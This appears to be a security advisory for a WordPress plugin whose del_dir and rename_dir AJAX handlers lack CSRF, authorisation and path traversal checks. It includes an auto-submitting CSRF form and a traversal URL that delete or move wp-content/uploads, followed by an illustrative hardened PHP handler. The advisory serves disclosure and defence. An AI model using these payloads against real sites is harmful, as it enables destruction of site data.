The lack of CSRF, authorisation and path traversal checks in the wp_ajax_del_dir() and wp_ajax_rename_dir() AJAX methods in functions.php makes it possible for an authenticated user with a role as low as subscriber to delete and rename arbitrary folders. CSRF attacks against such authenticated users are also possible, in order to make them perform those malicious actions.
<html>
<body onload="document.forms[0].submit()">
<form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="del_dir" />
<input type="hidden" name="dir" value="" />
</form>
</body>
</html>
The dir parameter can be changed; for example, using '../' will delete the content of wp-content/uploads.
To rename and move wp-content/uploads/articulate_uploads to wp-content/yolo:
https://<BLOG>/wp-admin/admin-ajax.php?action=rename_dir&dir_name=/&title=../../yolo/
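The three missing checks, shown as an added example of a hardened del_dir handler (this is not the plugin's own code or its actual fix). The handler name, the nonce action 'example_del_dir', the 'nonce' field name, the 'upload_files' capability and the use of wp-content/uploads/articulate_uploads as the permitted base directory are assumptions:

```php
<?php
// Added example, not the plugin's code. Names marked "assumed" are hypothetical.
add_action( 'wp_ajax_del_dir', 'example_hardened_del_dir' );

function example_hardened_del_dir() {
    // 1. CSRF: terminates the request with 403 unless a valid nonce for the
    //    assumed action 'example_del_dir' is sent in the assumed 'nonce' field.
    check_ajax_referer( 'example_del_dir', 'nonce' );

    // 2. Authorisation: subscribers do not hold 'upload_files' (assumed choice
    //    of capability; pick the one that matches who may manage uploads).
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Path traversal: resolve the requested path, then require the result
    //    to sit strictly below the base directory (assumed base, taken from
    //    the articulate_uploads folder named in the advisory).
    $uploads = wp_upload_dir();
    $base    = realpath( $uploads['basedir'] . '/articulate_uploads' );
    $dir     = isset( $_POST['dir'] )
        ? sanitize_text_field( wp_unslash( $_POST['dir'] ) )
        : '';
    $target  = ( false !== $base && '' !== $dir )
        ? realpath( $base . '/' . $dir )
        : false;

    // realpath() collapses '../' and symlinks; an empty value or '../'
    // resolves to the base or above it and fails the strict prefix test.
    if ( false === $target
        || ! is_dir( $target )
        || 0 !== strpos( $target, $base . DIRECTORY_SEPARATOR ) ) {
        wp_send_json_error( 'invalid directory', 400 );
    }

    // Only now touch the filesystem.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    if ( ! WP_Filesystem() ) {
        wp_send_json_error( 'filesystem unavailable', 500 );
    }
    global $wp_filesystem;
    $wp_filesystem->delete( $target, true );
    wp_send_json_success();
}
```

The rename handler needs the same nonce and capability checks. Because its destination does not exist yet, realpath() cannot validate the title value; reducing it to a single path component with basename() and joining it to the verified base directory keeps the result inside that directory.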